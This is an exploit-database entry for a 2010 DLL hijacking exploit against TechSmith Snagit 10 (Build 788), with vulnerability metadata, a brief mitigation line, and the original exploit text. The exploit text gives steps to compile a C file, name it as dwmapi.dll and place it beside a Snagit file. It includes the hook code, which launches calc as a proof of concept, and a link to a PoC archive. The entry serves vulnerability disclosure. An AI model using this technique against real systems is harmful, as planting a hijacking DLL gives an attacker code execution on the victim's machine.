TechSmith Snagit 10 (Build 788) Dll Hijacking Exploit

vendor:

Snagit

by:

Encrypt3d.M!nd

7,5

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Snagit

Affected Version From: 10 (Build 788)

Affected Version To: 10 (Build 788)

Patch Exists: NO

Related CWE: N/A

CPE: a:techsmith:snagit:10

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

TechSmith Snagit 10 (Build 788) Dll Hijacking Exploit

Compile the following code and rename it to dwmapi.dl and place file with one of the affected types in the same directory of the dll. Affected types: snag , snagcc , snagprof. Code used from this advisory: http://www.exploit-db.com/exploits/14758/

Mitigation:

Ensure that all DLLs are properly signed and that the application is running with the least privileges necessary.

Source

Exploit-DB raw data:

/*
TechSmith Snagit 10 (Build 788) Dll Hijacking Exploit
By: Encrypt3d.M!nd
Date: 25\8\2010
Download: http://www.techsmith.com/download/snagittrial.asp

Details:
Compile the following code and rename it to dwmapi.dl
and place file with one of the affected types in the same directory of the dll

Affected types: snag , snagcc , snagprof

Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/):
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14764.zip